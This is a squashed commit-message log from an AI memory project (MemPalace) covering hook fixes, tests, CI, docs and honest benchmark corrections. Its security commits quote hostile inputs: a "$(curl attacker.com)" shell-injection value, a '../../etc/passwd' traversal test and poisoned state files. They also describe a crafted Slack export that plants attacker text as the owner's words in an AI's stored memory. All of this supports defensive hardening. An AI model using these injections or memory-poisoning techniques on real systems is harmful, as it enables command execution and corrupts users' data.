on every subsequent turn — ~$1/session in wasted tokens. Fix: hooks now say "saved in background, no action needed" and use decision: allow instead of block. The agent continues working without interruption. All filing happens via the background pipeline. Also updated hooks README with: - Known limitation: hooks require session restart after install - Updated cost section: zero tokens, background-only Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use microsecond timestamp and full content hash in diary entry ID (#819) * fix: remove unused import 'main' from mempalace/__init__.py Removed the 'main' import from `mempalace/__init__.py` and updated `pyproject.toml` to point the script entry point directly to `mempalace.cli:main`. This ensures the CLI remains functional while improving code hygiene. Co-authored-by: igorls <[email protected]> * merge: full hardened stack + rewrite fact_checker around actual KG API Merges the full hardened stack (up through #791 drawer-grep) and turns fact_checker from "dead code hidden behind bare except" into an actually-working offline contradiction detector with tests. ## Dead paths the PR body advertised but the code never executed Both buried by a single outer ``except Exception: pass``: * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method; it has ``query_entity()``. The attribute error was silently swallowed and the entire KG branch always returned ``[]``. Now using ``kg.query_entity(subject, direction="outgoing")`` with proper handling of the ``predicate``/``object``/``current``/``valid_to`` fields the real API returns. * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only kwarg is ``db_path``. Passing ``palace_path`` raised TypeError, silently swallowed. Now computing the db_path correctly from ``<palace>/knowledge_graph.sqlite3``, matching the convention the MCP server already uses. ## Contradiction logic rewritten The previous ``if kg_pred in claim and fact.object not in claim`` only fired when text used the SAME predicate word as the KG fact — the exact opposite of the stated use case ("Bob is Alice's brother" when KG says husband" would NOT have fired). Replaced with a proper parse → lookup → compare pipeline: * ``_extract_claims`` parses two surface forms ("X is Y's Z" and "X's Z is Y") into ``(subject, predicate, object)`` triples. * ``_check_kg_contradictions`` pulls the subject's outgoing facts and flags two classes: - ``relationship_mismatch`` when a current KG fact matches the same ``(subject, object)`` pair but with a different predicate. - ``stale_fact`` when the exact triple exists but is ``valid_to``-closed in the past. * Stale-fact detection is now implemented (the PR body claimed it; the old code silently didn't implement it). ## Performance fix — O(n²) → O(mentioned × n) ``_check_entity_confusion`` previously computed Levenshtein for every pair of registered names on every ``check_text`` call. For 1,000 registered names that's ~500K edit-distance calls per hook invocation. Now we first identify which registry names actually appear in the text (single regex scan), then only compute edit distance between mentioned and unmentioned names. Pinned by a test that asserts <200ms on a 500- name registry with zero mentions. Also: when *both* similar names are mentioned in the text, we no longer flag them — the user clearly knows they're different people. ## Shared entity-registry loader ``mempalace/miner.py`` already had an mtime-cached loader for ``~/.mempalace/known_entities.json``. fact_checker had a duplicate implementation that leaked file handles and ignored caching. Extended miner's cache to expose both the flat set (``_load_known_entities``) and the raw category dict (``_load_known_entities_raw``); fact_checker now imports the latter. No more double disk reads, no more handle leak. ## Tests — 24 cases in tests/test_fact_checker.py All three detection paths + both dead-code regressions: * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the correct KG constructor signature so the ``palace_path=`` bug can't come back. * ``test_relationship_mismatch_detected`` — the headline example from the PR body now actually fires. * ``test_stale_fact_detected`` — valid_to-closed triple is flagged. * ``test_current_fact_same_triple_is_not_flagged`` — no false positive on a still-valid match. * ``test_performance_bounded_by_mentioned_names`` — 500-name registry, zero mentions, <200ms. Regression for the O(n²) blowup. * ``test_no_false_positive_when_both_names_mentioned`` — Mila and Milla in the same text is fine. * Plus claim extraction, flatten_names shapes, CLI exit code, empty text handling, missing-palace graceful fallback, registry-dict shape support. 785/785 suite pass. ruff + format clean on CI-pinned 0.4.x. * Optimize entity detection with regex caching and pre-compilation - Use functools.lru_cache to cache compiled patterns for entity names. - Pre-compile static pronoun patterns into a single regex. - Remove redundant .lower() calls in score_entity loop. Co-authored-by: igorls <[email protected]> * docs: fix stale milla-jovovich org URLs in website and plugin manifests (#787) Follow-up to #766 which covers version.py, pyproject.toml, README, CHANGELOG, and CONTRIBUTING. These 11 files still had the old org name in URLs: - website/ (VitePress config + 6 docs pages) - .claude-plugin/ (plugin.json repository, README marketplace command) - .codex-plugin/ (plugin.json URLs, README links) Author name fields are intentionally unchanged. * test: make diary state path assertion platform-neutral The Windows CI job failed on: assert '/.mempalace/state/' in str(state_path) because Windows uses ``\`` as the path separator, so the substring never matches. The behavior under test (state file lives outside the diary dir, under ``~/.mempalace/state/``) is already correct on both platforms — only the assertion was Unix-only. Switch to ``state_path.parent`` comparisons that work on any OS. * test: serialize mine_lock concurrency test with multiprocessing The macOS CI job failed ``test_lock_blocks_concurrent_access`` because ``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads in the same process both acquire even when they open their own file descriptors. The test passed on Linux (per-FD flock) and Windows (per-FD ``msvcrt.locking``) but was never actually exercising the lock's real contract. ``mine_lock`` is designed to serialize multi-*agent* access — i.e., separate processes, not threads. Switch the test to ``multiprocessing.get_context('spawn')`` with a module-level worker (so the spawn pickles cleanly) so it: 1. reflects the actual use case (one lock per mining process); 2. passes on all three OSes without flock-semantics branching; 3. catches real regressions (a broken lock would now let both processes through, exactly what we care about). Hold time bumped to 0.3s and the "wait until p1 acquires" delay to 0.2s to tolerate spawn's higher startup latency on macOS/Windows. * test: verify mine_lock via disjoint critical-section intervals The previous revision used multiprocessing but still relied on timing ("second process waited at least N seconds") which flakes on CI where spawn overhead eats into the hold window. Linux CI observed the second process report a 0.088s wait — below the 0.1s threshold — even though the lock behavior was correct; spawn was just slow enough that the first process had nearly finished holding when the second got past its own spawn. Switch to effect-based verification: each worker logs its [enter_time, exit_time] inside the critical section, and the test asserts the two intervals are disjoint after sorting. A broken lock would produce overlapping intervals regardless of spawn latency; a working lock cannot. Also removed the mp.Queue since we no longer pass timing data back. * Fix: ruff format with CI-pinned version (0.4.x) * fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835) * fix: README audit — match every claim to shipped code + add hall detection TDD audit: wrote 42 tests verifying README claims against codebase. Fixed all 7 failures: 1. Tool count: 19 → 29 (10 tools were undocumented) 2. Added tool table rows for tunnels, drawer management, system tools 3. Version badge: 3.1.0 → 3.2.0 4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers" 5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py) 6. pyproject.toml version in project structure: v3.0.0 → v3.2.0 7. Hall detection: added detect_hall() to miner.py — drawers now tagged with hall metadata so palace_graph.py can build hall connections New code: - miner.py: detect_hall() — keyword scoring against config hall_keywords, writes hall field to every drawer's metadata - tests/test_hall_detection.py — 12 TDD tests (written before code) - tests/test_readme_claims.py — 42 TDD tests verifying README accuracy 859/859 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: resolve ruff lint — unused imports and variables Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * style: ruff format with CI-pinned 0.4.x Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use conftest fixtures in hall tests for Windows compat Windows CI fails with NotADirectoryError when ChromaDB tries to write HNSW files in short-lived TemporaryDirectory. Use conftest palace_path and tmp_dir fixtures instead — same pattern as all other tests that touch ChromaDB. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: address Igor's review — convo_miner halls, cached config, markdown typo TDD: wrote tests for convo_miner hall metadata and config caching BEFORE verifying the code changes. 1. README markdown typo: extra ** in wake-up token row (line 195) 2. convo_miner.py: added _detect_hall_cached() — conversation drawers now get hall metadata (was missing, Igor caught it) 3. miner.py + convo_miner.py: cached hall_keywords at module level so config.json isn't re-read per drawer during bulk mine 4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching 861/861 tests pass. ruff clean. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> --------- Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * fix(website): update vitepress base url for custom domain * chore(release): bump version strings to 3.3.0 and curate CHANGELOG Prepare develop for the 3.3.0 release cycle. Version bumps: - mempalace/version.py: 3.2.0 -> 3.3.0 - pyproject.toml: 3.2.0 -> 3.3.0 - README.md: pyproject.toml label and shields.io badge - uv.lock: mempalace 3.0.0 -> 3.3.0 (also fills in resolved dev/extras) CHANGELOG.md: - Close out the stale [Unreleased] section as [3.2.0] - 2026-04-12 (v3.2.0 was tagged on that date but the release flip was never made) - Add a fresh [Unreleased] - v3.3.0 section covering the 49 commits since v3.2.0: closet layer, BM25 hybrid search, entity metadata, diary ingest, cross-wing tunnels, drawer-grep, offline fact checker, LLM-based closet regen, hall detection, cosine-distance fix, multi-agent locking, README audit, etc. - Adopt Keep a Changelog + SemVer framing - Add version compare reference links at the bottom - Fix stale milla-jovovich/mempalace preamble URL to MemPalace/mempalace --------- Co-authored-by: MSL <[email protected]> Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> Co-authored-by: eblander <[email protected]> Co-authored-by: shafdev <[email protected]> Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: mvalentsev <[email protected]> Co-authored-by: Dominique Deschatre <[email protected]> * ci: serve docs from develop only Docs deploy to GitHub Pages from develop for faster iteration cycles. Main was failing the deploy step with "Branch 'main' is not allowed to deploy to github-pages due to environment protection rules" on every release merge (v3.2.0, v3.3.0) — noise without signal, since docs weren't meant to serve from main anyway. Removes main from both the push trigger and the deploy-job guard. Develop continues to deploy as before; manual dispatch still works. * fix(status): paginate metadata fetch to support large palaces `col.get(limit=total)` causes SQLite "too many SQL variables" on palaces with >10k drawers (#802) and on older versions the hardcoded limit=10000 silently truncated the count (#850). Paginate in 5k batches using offset and aggregate wing/room counts incrementally. Also use `col.count()` for the header instead of `len(metas)` so the displayed total is always correct. Tested on a 122,686-drawer palace. Fixes #850 Related: #802, #723 * refactor: route all chromadb access through ChromaBackend Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules. * fix: update stale org URLs in pyproject.toml and README (#787) * fix: harden hooks against shell injection, path traversal, and arithmetic injection save_hook.sh: - Coerce stop_hook_active to strict True/False before eval to prevent command injection via crafted JSON (e.g. "$(curl attacker.com)") - Validate LAST_SAVE as plain integer with regex before bash arithmetic to prevent command substitution via poisoned state files hooks_cli.py: - Add _validate_transcript_path() that rejects paths with '..' components and non-.jsonl/.json extensions - _count_human_messages() now uses the validator, returning 0 for invalid paths instead of opening arbitrary files Tests: - Path traversal rejection (../../etc/passwd) - Wrong extension rejection (.txt, .py) - Valid path acceptance (.jsonl, .json) - Empty string handling - Shell injection in stop_hook_active field Refs: MemPalace/mempalace#809 * fix: add logging on rejected transcript paths and platform-native path test - _count_human_messages() now logs a WARNING via _log() when a non-empty transcript_path is rejected by the validator, making silent auto-save failures diagnosable via hook.log - Add test for platform-native paths (backslashes on Windows) to verify _validate_transcript_path works cross-platform - Add test verifying the warning log is emitted on rejection Refs: MemPalace/mempalace#809 * Increase visibility of fake website caution Noticed a URL ``` hXXps://www.mempalace[.]tech/ ``` Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README. * fix: use permissive validator for KG entity values (closes #455) sanitize_name rejects commas, colons, parentheses, and slashes — characters that commonly appear in knowledge graph subject/object values. Adds sanitize_kg_value for KG entity fields (subject, object, entity) while keeping sanitize_name for predicates and wing/room names. * chore: bump plugin manifests to 3.3.0 and fix owner URL Aligns marketplace.json and both plugin.json files with version.py / pyproject.toml (already at 3.3.0) so `/plugin update` reflects the v3.1.0/v3.2.0/v3.3.0 tags that had been landing without manifest bumps. Also updates marketplace.json `owner.url` from the stale github.com/milla-jovovich path to the current github.com/MemPalace org. Refs #874 * ci: add version guard to catch tag/manifest drift Fails a tag push if `vX.Y.Z` does not match `mempalace/version.py` (the single source of truth per CLAUDE.md), and fails PRs that touch any version file without keeping all five in sync (pyproject.toml, version.py, .claude-plugin/marketplace.json, .claude-plugin/plugin.json, .codex-plugin/plugin.json). Prevents the class of bug described in #874, where v3.1.0/v3.2.0/v3.3.0 tags all landed pointing at commits that still carried manifest version 3.0.14, blocking `/plugin update` for end users. Refs #874 * ci: let semver pre-release tags bypass strict manifest match Tags matching `vX.Y.Z-*` (e.g. v3.4.0-rc1, v1.0.0-beta.2) are treated as internal/staging builds. They skip the tag-vs-manifest check because pre-releases do not flow to end users via `/plugin update`, which reads the manifest on the default branch. Stable tags `vX.Y.Z` still require all five version sources to match exactly, so the protection against the #874 drift remains intact. The cross-file consistency check on PRs is unchanged — all manifests must still agree with mempalace/version.py whenever any version file moves. * fix: ship CNAME in Pages artifact to pin custom domain Adds website/public/CNAME containing `mempalaceofficial.com` so the VitePress build output always includes /CNAME in the Pages artifact. Without this, the custom-domain setting is only held in the repo's Pages API config — if it ever drifts (manual edit, org move, workflow change), the site reverts to <org>.github.io with no record in source. Note: this does not fix the current site outage. The root cause is DNS — mempalaceofficial.com has no A/AAAA/CNAME records pointing at GitHub Pages IPs. That has to be fixed at the registrar. This commit is the belt-and-suspenders so that once DNS is back, the domain is pinned in source and the next workflow refactor can't accidentally drop it. * docs: tighten SECURITY.md with real version policy and GHPVR-only channel Builds on @Yorji-Porji's draft by fixing three issues before it lands: - Replace the `< 1.0.0` placeholder table with MemPalace's actual support policy: current major (3.x) receives fixes, 2.x and earlier do not. - Remove the `[Insert Maintainer Email Here]` placeholder and the email fallback. GitHub Private Vulnerability Reporting is enabled on this repo; the policy points there exclusively so there is no risk of a researcher emailing a dead address. - Drop the meta-note ("Adjust the table above…") that was an instruction to the maintainer, not policy text. Structure, triage timelines, and credit language are kept as drafted. * fix: allow mining directories without local mempalace.yaml When no mempalace.yaml or mempal.yaml exists in the source directory, return a default config (wing = directory name, room = general) instead of calling sys.exit(1). This lets users mine any directory into their palace without requiring init first. Closes #14. * fix: remove unused sys import * fix: send missing-yaml warning to stderr and flag basename collisions Addresses review feedback on #604: - Warning now goes to stderr instead of stdout so it doesn't mix with mine progress output when users pipe stdout elsewhere. - Warning explicitly calls out that directories with the same basename will share a wing name, and suggests adding mempalace.yaml to disambiguate. Prevents silent content mixing across projects mined without yaml. * docs: name official domain and specific impostors in scam alert Replace the blanket ban on .tech/.io/.com domains with an allowlist of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com) and call out mempalace.tech as the reported impostor. The blanket .com ban would have flagged mempalaceofficial.com as fake once DNS resolves (CNAME shipped in #877). Also update the April 11 follow-up section to match so the two notices no longer contradict each other. * perf: optimize regex compilation in entity extraction Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution. Co-authored-by: igorls <[email protected]> * feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871) export MEMPAL_VERBOSE=true → hook blocks, agent writes diary in chat export MEMPAL_VERBOSE=false → silent background save (default) Developers need to see code and diaries being written. Regular users want zero chat clutter. Now both work. TDD: tests written first, failed, code fixed, tests pass. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * feat: add VSCode devcontainer matching CI environment Contributors now get a one-click dev environment that mirrors CI exactly: Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same >=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from the existing .pre-commit-config.yaml. Pinning ruff in post-create.sh is the load-bearing piece: pyproject only sets a floor, so without the pin the ruff extension would install 0.15.x and phantom-fail lint against CI's 0.4.x. * fix: add missing self._lock to query_relationship, timeline, stats in KnowledgeGraph * fix: replace invalid 'decision: allow' with {} in hooks Closes #872. The top-level decision field only recognizes "block". To not block, return empty JSON {}. "allow" was silently ignored by Claude Code, causing unpredictable behavior. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: add missing self._lock to KnowledgeGraph.close() TDD: test first, failed, fixed, passed. Igor fixed query_relationship/timeline/stats in an earlier commit. close() was the last method touching self._connection without holding the lock. Closes #883. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * benchmarks: add --llm-backend ollama for non-Anthropic rerank The rerank pipeline was hardcoded to Anthropic's /v1/messages. Add a backend flag so the same code path can be exercised with any OpenAI-compatible endpoint — local Ollama, Ollama Cloud, or any gateway that speaks /v1/chat/completions. Enables independent verification of the "100% with Haiku rerank" claim by running the full benchmark with a different LLM family (e.g. minimax-m2.7:cloud) and zero Anthropic dependency. Both longmemeval_bench.py and locomo_bench.py: - llm_rerank*() gain backend= / base_url= kwargs - CLI: --llm-backend {anthropic,ollama}, --llm-base-url - API key required only when backend=anthropic (diary/palace modes still require it) - Parse last integer in response (reasoning models emit multi-int output) - Fallback to message.reasoning when content is empty - Raise max_tokens to 1024 for reasoning models * benchmarks: apply ruff-format to llm_rerank (trivial line wrap) * benchmarks: add v3.3.0 reproduction results + 50/450 split Addresses #875: every internal BENCHMARKS.md claim reproduced on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings, seed=42 for the LongMemEval dev/held-out split). Scorecard — all reproduce exactly: LongMemEval raw R@5 96.6% (500/500) ✅ hybrid_v4 held-out 450 R@5 98.4% (442/450) ✅ hybrid_v4 + minimax rerank R@5 99.2% (496/500) * hybrid_v4 + minimax rerank R@10 100.0% (500/500) * LoCoMo (session, top-10) raw 60.3% (1986q) ✅ hybrid v5 88.9% (1986q) ✅ ConvoMem all-categories (250 items) 92.9% ✅ MemBench all-categories (8500) 80.3% ✅ * The minimax-m2.7:cloud rerank run replicates the "100%" claim with a different LLM family (no Anthropic dependency). R@10 is a perfect reproduction; R@5 misses 4 questions that the published Haiku run caught — consistent with BENCHMARKS.md's own disclosure that hybrid_v4 includes three question-specific fixes developed by inspecting misses, i.e. teaching to the test. The committed 50/450 split is the deterministic (seed=42) split BENCHMARKS.md references but wasn't previously in the repo. Full result JSONLs include every question, every retrieved id, and every score — auditable end-to-end. * docs: slim README and move corrections/notices to docs/HISTORY.md Addresses #875. The previous README was 755 lines mixing six purposes (scam alert, hero, two mea-culpa notes, install guide, architecture explainer, API reference, file map). Rework it as a pure entry point: what MemPalace is, how to install, honest benchmark numbers, links to the website for concept/architecture documentation. Key content changes: - Drop the "highest-scoring AI memory system ever benchmarked" framing. - New tagline: "Local-first AI memory. Verbatim storage, pluggable backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids naming a specific vector-store implementation since the backend is pluggable (see mempalace/backends/base.py). - Remove the cross-system comparison table. Retrieval recall (R@5) and end-to-end QA accuracy are different metrics and are not comparable; placing MemPalace's R@5 next to competitor QA accuracy under a single column header was a category error. - The "100%" LongMemEval headline is no longer the lead. The honest held-out figure is 98.4% R@5 on 450 unseen questions. The rerank pipeline reaches >=99% with any capable LLM (reproduced with Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level, not model-specific. - Benchmark reproduction commands now reference the correct repo (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch). New file: docs/HISTORY.md as the canonical home for post-launch corrections, public notices, and retractions. Contains verbatim: - 2026-04-14 note on this rewrite (links to #875) - 2026-04-11 impostor-domain notice (moved from README header) - 2026-04-07 "A Note from Milla & Ben" (moved from README body) README keeps a one-line scam-alert callout that links to docs/HISTORY.md for the full timeline. * docs(website): align mempalaceofficial.com with honest benchmarks Part of #875. Bring the VitePress site into line with the new README and the reproducibility scorecard: drop category-error comparisons, drop retracted claims, retain only metrics and caveats that survive audit. website/index.md - New tagline matches README (local-first, verbatim, pluggable backend, 96.6% R@5 raw, zero API calls). - Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra 94.87% / Mem0 ~85%" comparison table with a single honest table showing MemPalace's own retrieval-recall numbers (raw 96.6%, hybrid v4 held-out 98.4%). Add an explicit sentence explaining why we no longer publish a cross-system table on the landing page (retrieval recall vs QA accuracy are different metrics). - Soften the "ChromaDB-powered vector search" feature blurb to be backend-agnostic, since the retrieval layer is pluggable. website/reference/benchmarks.md - Full rewrite of the retrieval-recall tables. No more "100%" headline; honest held-out 98.4% R@5 replaces it. Added the model-agnostic rerank result (99.2% R@5 / 100% R@10 with minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific. - Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row. With per-conversation session counts of 19-32 and top_k=50, the retrieval stage returns every session by construction — the number measures an LLM's reading comprehension, not retrieval. - Drop the cross-system comparison tables. Link out to each project's own research page (Mastra, Mem0, Supermemory) for their published numbers and metric definitions. - Rewrite reproduction commands to use the correct repository and demonstrate the new --llm-backend ollama flag. website/concepts/the-palace.md - Remove the "+34%" row / paragraph. Wing/room filtering is standard metadata filtering in the vector store, not a novel retrieval mechanism — the April-7 note already retracted that framing; this finishes the retraction on the website where it had remained. website/guide/searching.md - Same treatment for "34% retrieval improvement". Reframe as operational scoping, not a novel boost. website/reference/contributing.md - Update the "palace structure matters" bullet to reflect the same framing: scoping-not-magic. website/concepts/knowledge-graph.md - Replace the MemPalace-vs-Zep feature matrix with a short "related work" note that links to Zep's own documentation for authoritative details on their deployment model. Avoids claims we cannot verify at source. * docs: #875 follow-up — repo surfaces + reproduction URLs + CHANGELOG Remaining in-repo surfaces carrying the same retracted or broken claims as the public pages fixed in the previous two commits. CONTRIBUTING.md - "Palace structure matters ... 34% retrieval improvement" → reframed as scoping (same rewording applied to the website equivalents). benchmarks/BENCHMARKS.md - Add a prominent "Important caveat" block at the top of the "Comparison vs Published Systems" table explaining that R@5 (retrieval recall) and QA accuracy are different metrics, with citations to Mastra, Mem0, and Supermemory's own published methodology pages. Annotate the specific competitor rows whose numbers are QA accuracy, not retrieval recall. - Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4 → 100 step was tuned on 3 specific wrong answers (already disclosed further down in the doc under "Benchmark Integrity"); the honest hybrid figure is held-out 98.4%. - Fix the broken clone URL — `aya-thekeeper/mempal` no longer points at anything; now `MemPalace/mempalace`. benchmarks/README.md + benchmarks/HYBRID_MODE.md - Same clone-URL fix applied. CHANGELOG.md - Add a ### Documentation entry under [Unreleased] v3.3.0 that names #875 and summarises the scope of the rewrite. * docs+tests: fix CI after README slim (#875) The regression-guard tests added in #835 were pinned to the old README shape (tool table + file-reference table). When #897 slimmed the README and moved that content to the website, three tests started failing: TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict TestNoUnlistedTools.test_no_undocumented_tools TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless Changes in this commit: 1. Update the 3 tests to track the new canonical docs surfaces - Tool list -> website/reference/mcp-tools.md (tests parse `### \`mempalace_xxx\`` headings instead of markdown table rows). - dialect.py lossless disclaimer -> website/reference/modules.md (any line mentioning dialect.py must not also say "lossless"). 2. Fix the website to make "no undocumented tools" true Add the 10 tools that existed in TOOLS but were missing from website/reference/mcp-tools.md (create_tunnel, delete_tunnel, follow_tunnels, list_tunnels, get_drawer, list_drawers, update_drawer, hook_settings, memories_filed_away, reconnect). Page header now correctly says "all 29 MCP tools". 3. Align pre-commit ruff pin to match CI (0.4.x) .pre-commit-config.yaml was pinning ruff v0.9.0, while .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two formatters produce incompatible output (e.g. v0.9.0 reformats `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects), which would cause the pre-commit hook to modify files that CI then flags as unformatted. Pinning the hook to v0.4.10 keeps the dev loop and CI in lock-step. Full suite: 887 passed, 0 failed. * fix: address i18n review issues from PR #718 Three issues flagged by bensig on the i18n PR before merge: 1. ko.json: status_drawers used {drawers} instead of {count}, causing the Korean UI to show the raw template string instead of the actual drawer count. All other 7 languages use {count}. 2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py with a sys.path.insert hack. Moved to tests/test_i18n.py per the project convention in AGENTS.md. 3. Dialect.from_config() passed lang=config.get("lang") which defaults to None, causing __init__ to inherit whatever language was loaded earlier via module-level state. Now defaults to "en" explicitly so from_config is deterministic regardless of prior load_lang() calls. Added two regression tests for the ko.json fix and the state leak. * docs(cli): clarify that 'mempalace init' requires <dir> (#210) (#862) Fixes #210. The CLI requires a positional <dir> argument. Previous docs emphasized that init 'sets up ~/.mempalace/' which misled users into expecting no arguments. Now the docs show <dir> is required, offer '.' as the usage for the current directory, and reword the description so the project-directory scan is listed first. * fix: make entity_registry.research() local-only by default (#811) * fix: make entity_registry.research() local-only by default research() previously called _wikipedia_lookup() unconditionally, sending entity names to en.wikipedia.org on every uncached lookup. This violates the project's local-first and privacy-by-architecture principles documented in CLAUDE.md. Changes: - research() now returns "unknown" for uncached words by default - New allow_network=True parameter required for Wikipedia lookups - Wikipedia 404 now returns "unknown" instead of asserting "person" with 0.70 confidence, preventing entity registry poisoning - Added privacy warning docstring to _wikipedia_lookup() - Added tests for local-only default, opt-in network, 404 handling, and cache-not-persisted-on-local-only behaviour Refs: MemPalace/mempalace#809 * fix: improve research() cache read path and deduplicate test mocks - Use .get() instead of .setdefault() for cache reads in research() so the local-only path never mutates _data unnecessarily - Move .setdefault() to the network-write path only - Use result.setdefault() for word/confirmed keys to ensure consistent return shape across all _wikipedia_lookup error paths - Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON constant shared by 3 test functions * fix: return empty status instead of error on cold-start palace (#830) (#831) tool_status() called _get_collection() with the default create=False, which throws when the ChromaDB collection does not exist yet (valid palace, zero drawers). The exception was swallowed and status returned "No palace found" even though init had completed successfully. Switching to create=True bootstraps an empty collection on first status call, matching what the write path already does. Fix suggested by @hkevinchu in the issue. * fix(searcher): guard against empty ChromaDB query results (#195) (#865) Fixes #195. When ChromaDB returns no documents (empty palace, or wing/room filter that excludes everything), it returns the shape: {"documents": [], "metadatas": [], "distances": []} Indexing `results["documents"][0]` blindly raises IndexError instead of the expected 'no results' response. Affected: searcher.search(), searcher.search_memories() (drawer + closet branches plus the total_before_filter aggregate), and Layer3.search() / Layer3.search_raw(). Adds a tiny private helper `searcher._first_or_empty(results, key)` that safely extracts the inner list, returning [] for any of: missing key, empty outer list, [None], or [[]]. layers.py imports the same helper to avoid duplicating the guard. Tests: tests/test_empty_chromadb_results.py covers all observed shapes plus a documentation-style test that pins the original IndexError so future readers understand why the helper exists. * fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866) Partially addresses #185. `mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into the project root. When <dir> is a git repository, those files have no default protection and risk being committed by accident — the loudest concern in the original report. This PR adds `_ensure_mempalace_files_gitignored()` which runs at the end of cmd_init: if <dir>/.git exists, append the two filenames to .gitignore (creating it if necessary) under a clearly-marked block. The helper is conservative: - only runs when <dir>/.git is present (no-op for non-git projects) - skips entries already present (no duplicates) - preserves existing .gitignore content - handles files without trailing newlines This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the issue's 'Expected' section proposes — that's a behavioral change with miner/config implications and warrants a separate design discussion. The gitignore safeguard removes the immediate risk without breaking any existing flow. Tests: 5 cases in tests/test_init_gitignore_protection.py covering no-op, fresh creation, partial append, idempotency, and missing-newline edge case. * fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864) * fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) Fixes #225. Several transitive dependencies (chromadb, onnxruntime, posthog) print banners and warnings to stdout — sometimes at the C level — during the mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC over stdio, any non-JSON output on stdout corrupted the message stream and broke Claude Desktop's parser with errors like: MCP mempalace: Unexpected token '*', "**********"... is not valid JSON MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude Desktop 1.1062.0. Fix: at module load, redirect stdout to stderr at both the Python level (sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1)) to catch C-level prints, while preserving the real stdout for later restore. main() calls _restore_stdout() right before entering the protocol loop so JSON-RPC responses still go to the real stdout. Adds tests/test_mcp_stdio_protection.py with three regression tests: - module-level redirect is in place after import - _restore_stdout() restores the original stdout (idempotent) - 'python -m mempalace.mcp_server' with empty stdin emits no stdout * style: reformat with ruff 0.4 (CI version) for #225 * fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863) * fix(hooks): stop precompact hook from blocking compaction The precompact hook unconditionally returned {"decision": "block"}, which in Claude Code means "cancel compaction" with no retry mechanism. This made /compact permanently broken for all plugin users. Changed hook_precompact() to mine the transcript synchronously (so data lands before compaction) and return {"decision": "allow"}. This matches the standalone bash hook in hooks/ which already uses allow. Also extracted _get_mine_dir() and _mine_sync() helpers so precompact can mine from the transcript directory, not just MEMPAL_DIR. Stop hook behavior is unchanged -- left for #673 which implements the full silent save path. Closes #856, closes #858. * fix: use empty JSON instead of invalid \"allow\" decision value Claude Code only recognizes \"block\" as a top-level decision value. \"allow\" is a permissionDecision value for PreToolUse hooks, not a valid top-level decision. The correct way to not block is to return empty JSON. Caught by #872. * feat: include created_at timestamp in search results (#846) * feat: include created_at timestamp in search results (closes #465) Surface the existing filed_at metadata as created_at in search result objects returned by search_memories(). Enables temporal reasoning over search hits without additional queries. * Feat: add fallback for missing filed_at metadata * fix: add provenance header and speaker IDs to Slack transcript imports (#815) * fix: add provenance header and speaker IDs to Slack transcript imports Slack exports are multi-party chats where no speaker is inherently the "user" or "assistant". The parser previously assigned these roles purely by position, allowing a crafted export to place attacker text in the "user" role — making it appear as the memory owner's words in all future retrieval (data poisoning via stored memory). Changes: - Add provenance header marking Slack transcripts as multi-party with positional (unverified) role assignment - Prefix each message with the original speaker ID ([U1], [U2], etc.) so downstream consumers can distinguish authors - Keep user/assistant role alternation for exchange-pair chunking compatibility with convo_miner.py Tests: - Provenance header presence and content - Speaker ID preservation in output - Attacker-first-message attribution verification Refs: 